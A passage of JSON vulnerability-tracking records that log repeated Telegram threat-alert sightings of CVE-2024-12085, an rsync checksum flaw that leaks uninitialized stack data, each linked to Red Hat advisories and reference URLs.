2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "cdcf077a-8fe4-4a16-b597-1503f1e58200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0688", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "5672d744-ae1b-40d7-b0f4-0faebc5fdbc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0787", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "cd756bc5-42c7-4e7e-93b1-791b8673e44f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1225", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "11acf516-234d-4f66-aac6-cd5aa8c1be0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1451", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "46ecb7a3-38cc-4fac-98ff-b6c39286215e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0774", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "88000d5a-42a0-451e-979d-11fe015332a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0324", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "39938d8d-7e41-4ce8-a970-5880c8c985bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0885", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "43d584e9-6ae6-4e35-854b-ab3885d4fe17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0637", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "3a6ca417-11df-4790-8d56-8434d3b64593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1120", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "0f87ba98-215c-4a07-85d6-f38e4858c4cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0884", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "7e0d9e08-3e0a-4f34-afb0-6a66b4e363f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1128", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "19f90f3a-4dc1-4ea2-befb-22aa990390c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0790", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "5cb6db03-ffd0-4696-a835-0047d38138bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1227", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "27cc8013-e637-46c7-8e05-c60cfb92d7bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0714", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat 